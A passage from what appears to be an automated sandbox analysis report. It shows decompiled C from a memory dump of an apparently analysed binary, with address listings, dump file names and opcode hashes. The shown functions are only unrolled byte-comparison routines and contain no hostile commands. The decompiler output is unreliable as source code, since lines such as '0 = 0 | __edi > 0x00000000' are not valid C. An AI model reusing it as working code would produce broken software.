						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t197 = _t246;
				return _t197;
			}
































                        0x10006b27
                        0x10006b27
                        0x10006b2d
                        0x10006bb5
                        0x10006bb7
                        0x10006bb9
                        0x00000000
                        0x00000000
                        0x10006bbf
                        0x10006bc5
                        0x10006c4c
                        0x10006c4e
                        0x10006c50
                        0x00000000
                        0x00000000
                        0x10006c56
                        0x10006c5c
                        0x10006ce3
                        0x10006ce5
                        0x10006ce7
                        0x00000000
                        0x00000000
                        0x10006ced
                        0x10006cf3
                        0x10006d7a
                        0x10006d7c
                        0x10006d7e
                        0x00000000
                        0x00000000
                        0x10006d8a
                        0x10006e12
                        0x10006e14
                        0x10006e16
                        0x00000000
                        0x00000000
                        0x10006e1c
                        0x10006e22
                        0x10006ea9
                        0x10006eab
                        0x10006ead
                        0x00000000
                        0x00000000
                        0x10006eb3
                        0x10006eb9
                        0x10006f40
                        0x10006f42
                        0x10006f44
                        0x00000000
                        0x00000000
                        0x10006f52
                        0x10006f54
                        0x10006f6c
                        0x10006f74
                        0x10006f76
                        0x100066cf
                        0x100066d7
                        0x100066d9
                        0x100066e6
                        0x100066e6
                        0x00000000
                        0x100066d9
                        0x10006f83
                        0x100066c9
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100066c9
                        0x10006f5d
                        0x10006f66
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006f66
                        0x10006ec6
                        0x10006ec8
                        0x10006ee0
                        0x10006ee8
                        0x10006eea
                        0x10006f02
                        0x10006f0a
                        0x10006f0c
                        0x10006f24
                        0x10006f2c
                        0x10006f2e
                        0x10006f37
                        0x10006f37
                        0x00000000
                        0x10006f2e
                        0x10006f15
                        0x10006f1e
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006f1e
                        0x10006ef3
                        0x10006efc
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006efc
                        0x10006ed1
                        0x10006eda
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006eda
                        0x10006e2f
                        0x10006e31
                        0x10006e49
                        0x10006e51
                        0x10006e53
                        0x10006e6b
                        0x10006e73
                        0x10006e75
                        0x10006e8d
                        0x10006e95
                        0x10006e97
                        0x10006ea0
                        0x10006ea0
                        0x00000000
                        0x10006e97
                        0x10006e7e
                        0x10006e87
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006e87
                        0x10006e5c
                        0x10006e65
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006e65
                        0x10006e3a
                        0x10006e43
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006e43
                        0x10006d98
                        0x10006d9a
                        0x10006db2
                        0x10006dba
                        0x10006dbc
                        0x10006dd4
                        0x10006ddc
                        0x10006dde
                        0x10006df6
                        0x10006dfe
                        0x10006e00
                        0x10006e09
                        0x10006e09
                        0x00000000
                        0x10006e00
                        0x10006de7
                        0x10006df0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006df0
                        0x10006dc5
                        0x10006dce
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006dce
                        0x10006da3
                        0x10006dac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006dac
                        0x10006d00
                        0x10006d02
                        0x10006d1a
                        0x10006d22
                        0x10006d24
                        0x10006d3c
                        0x10006d44
                        0x10006d46
                        0x10006d5e
                        0x10006d66
                        0x10006d68
                        0x10006d71
                        0x10006d71
                        0x00000000
                        0x10006d68
                        0x10006d4f
                        0x10006d58
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006d58
                        0x10006d2d
                        0x10006d36
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006d36
                        0x10006d0b
                        0x10006d14
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006d14
                        0x10006c69
                        0x10006c6b
                        0x10006c83
                        0x10006c8b
                        0x10006c8d
                        0x10006ca5
                        0x10006cad
                        0x10006caf
                        0x10006cc7
                        0x10006ccf
                        0x10006cd1
                        0x10006cda
                        0x10006cda
                        0x00000000
                        0x10006cd1
                        0x10006cb8
                        0x10006cc1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006cc1
                        0x10006c96
                        0x10006c9f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006c9f
                        0x10006c74
                        0x10006c7d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006c7d
                        0x10006bd2
                        0x10006bd4
                        0x10006bec
                        0x10006bf4
                        0x10006bf6
                        0x10006c0e
                        0x10006c16
                        0x10006c18
                        0x10006c30
                        0x10006c38
                        0x10006c3a
                        0x10006c43
                        0x10006c43
                        0x00000000
                        0x10006c3a
                        0x10006c21
                        0x10006c2a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006c2a
                        0x10006bff
                        0x10006c08
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006c08
                        0x10006bdd
                        0x10006be6
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006b33
                        0x10006b37
                        0x10006b3b
                        0x10006b3d
                        0x10006b55
                        0x10006b55
                        0x10006b5d
                        0x10006b5f
                        0x10006b77
                        0x10006b77
                        0x10006b7f
                        0x10006b81
                        0x10006b99
                        0x10006b99
                        0x10006ba1
                        0x10006ba3
                        0x10006bac
                        0x10006bac
                        0x00000000
                        0x10006ba3
                        0x10006b87
                        0x10006b8a
                        0x10006b93
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006b93
                        0x10006b65
                        0x10006b68
                        0x10006b71
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006b71
                        0x10006b43
                        0x10006b46
                        0x10006b4f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006b4f
                        0x100062b5
                        0x100062b5
                        0x100070a6

                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction ID: dba2690435f19ab94b9c718f143c1f7ded23596ac492d5ba3488478ce37288e5
                        • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                        • Instruction Fuzzy Hash: EAC15F3220559309FB5D8A79C83413EBBE2EB966F1327176DD4B2DF1D8EF20C5649A20
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 100062BD, Relevance: .3, Instructions: 331COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E100062BD(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
									_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
								}
								goto L22;
							}
							_t231 = (0 | _t312 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L19;
						}
						_t231 = (0 | _t310 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L17;
					}
					_t231 = (0 | _t308 > 0x00000000) * 2 - 1;
					if(_t231 != 0) {
						goto L1;
					}
					goto L15;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
					if(__edi == 0) {
						L4:
						__edi =  *(__esi - 0x1c) & 0x000000ff;
						__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
						if(__edi == 0) {
							L6:
							__edi =  *(__esi - 0x1b) & 0x000000ff;
							__edi = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
							if(__edi == 0) {
								L8:
								__ecx =  *(__esi - 0x1a) & 0x000000ff;
								__ecx = ( *(__esi - 0x1a) & 0x000000ff) - ( *(__edx - 0x1a) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L11;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L8;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L6;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L4;
				}
				L1:
				_t184 = _t231;
				return _t184;
			}






























                        0x100062bd
                        0x100062bd
                        0x100062c3
                        0x1000633a
                        0x1000633c
                        0x1000633e
                        0x00000000
                        0x00000000
                        0x10006344
                        0x1000634a
                        0x100063d1
                        0x100063d3
                        0x100063d5
                        0x00000000
                        0x00000000
                        0x100063db
                        0x100063e1
                        0x10006468
                        0x1000646a
                        0x1000646c
                        0x00000000
                        0x00000000
                        0x10006472
                        0x10006478
                        0x100064ff
                        0x10006501
                        0x10006503
                        0x00000000
                        0x00000000
                        0x10006509
                        0x1000650f
                        0x10006596
                        0x10006598
                        0x1000659a
                        0x00000000
                        0x00000000
                        0x100065a6
                        0x1000662e
                        0x10006630
                        0x10006632
                        0x00000000
                        0x00000000
                        0x10006638
                        0x1000663e
                        0x100066c5
                        0x100066c7
                        0x100066c9
                        0x100066d7
                        0x100066d9
                        0x100066e6
                        0x100066e6
                        0x100066d9
                        0x00000000
                        0x100066c9
                        0x1000664b
                        0x1000664d
                        0x10006665
                        0x1000666d
                        0x1000666f
                        0x10006687
                        0x1000668f
                        0x10006691
                        0x100066a9
                        0x100066b1
                        0x100066b3
                        0x100066bc
                        0x100066bc
                        0x00000000
                        0x100066b3
                        0x1000669a
                        0x100066a3
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100066a3
                        0x10006678
                        0x10006681
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006681
                        0x10006656
                        0x1000665f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000665f
                        0x100065b4
                        0x100065b6
                        0x100065ce
                        0x100065d6
                        0x100065d8
                        0x100065f0
                        0x100065f8
                        0x100065fa
                        0x10006612
                        0x1000661a
                        0x1000661c
                        0x10006625
                        0x10006625
                        0x00000000
                        0x1000661c
                        0x10006603
                        0x1000660c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000660c
                        0x100065e1
                        0x100065ea
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100065ea
                        0x100065bf
                        0x100065c8
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100065c8
                        0x1000651c
                        0x1000651e
                        0x10006536
                        0x1000653e
                        0x10006540
                        0x10006558
                        0x10006560
                        0x10006562
                        0x1000657a
                        0x10006582
                        0x10006584
                        0x1000658d
                        0x1000658d
                        0x00000000
                        0x10006584
                        0x1000656b
                        0x10006574
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006574
                        0x10006549
                        0x10006552
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006552
                        0x10006527
                        0x10006530
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006530
                        0x10006485
                        0x10006487
                        0x1000649f
                        0x100064a7
                        0x100064a9
                        0x100064c1
                        0x100064c9
                        0x100064cb
                        0x100064e3
                        0x100064eb
                        0x100064ed
                        0x100064f6
                        0x100064f6
                        0x00000000
                        0x100064ed
                        0x100064d4
                        0x100064dd
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100064dd
                        0x100064b2
                        0x100064bb
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100064bb
                        0x10006490
                        0x10006499
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006499
                        0x100063ee
                        0x100063f0
                        0x10006408
                        0x10006410
                        0x10006412
                        0x1000642a
                        0x10006432
                        0x10006434
                        0x1000644c
                        0x10006454
                        0x10006456
                        0x1000645f
                        0x1000645f
                        0x00000000
                        0x10006456
                        0x1000643d
                        0x10006446
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006446
                        0x1000641b
                        0x10006424
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006424
                        0x100063f9
                        0x10006402
                        0x00000000
                        0x00000000
                        0x00000000
                        0x10006402
                        0x10006357
                        0x10006359
                        0x10006371
                        0x10006379
                        0x1000637b
                        0x10006393
                        0x1000639b
                        0x1000639d
                        0x100063b5
                        0x100063bd
                        0x100063bf
                        0x100063c8
                        0x100063c8
                        0x00000000
                        0x100063bf
                        0x100063a6
                        0x100063af
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100063af
                        0x10006384
                        0x1000638d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000638d
                        0x10006362
                        0x1000636b
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100062c5
                        0x100062c5
                        0x100062cc
                        0x100062ce
                        0x100062e2
                        0x100062e2
                        0x100062ea
                        0x100062ec
                        0x10006300
                        0x10006300
                        0x10006308
                        0x1000630a
                        0x1000631e
                        0x1000631e
                        0x10006326
                        0x10006328
                        0x10006331
                        0x10006331
                        0x00000000
                        0x10006328
                        0x10006310
                        0x10006313
                        0x1000631c
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1000631c
                        0x100062f2
                        0x100062f5
                        0x100062fe
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100062fe
                        0x100062d4
                        0x100062d7
                        0x100062e0
                        0x00000000
                        0x00000000
                        0x00000000
                        0x100062e0
                        0x100062b5
                        0x100062b5
                        0x100070a6

                        Memory Dump Source
                        • Source File: 00000000.00000002.354904922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                        • Associated: 00000000.00000002.354899107.0000000010000000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354953530.0000000010014000.00000002.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354975376.000000001001A000.00000004.00020000.sdmp Download File
                        • Associated: 00000000.00000002.354995139.000000001001F000.00000002.00020000.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction ID: 2083d964b3183f57a0d3fd909884ee548d6d7061eb39dd1fe6437e0fcef10a12
                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction Fuzzy Hash: 45C163322055930AEB4DCA798C3413EBBE2DB966F1327176DD8B2DF1D8EF10D5249A60
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 10005EA5, Relevance: .3, Instructions: 323COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E10005EA5(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
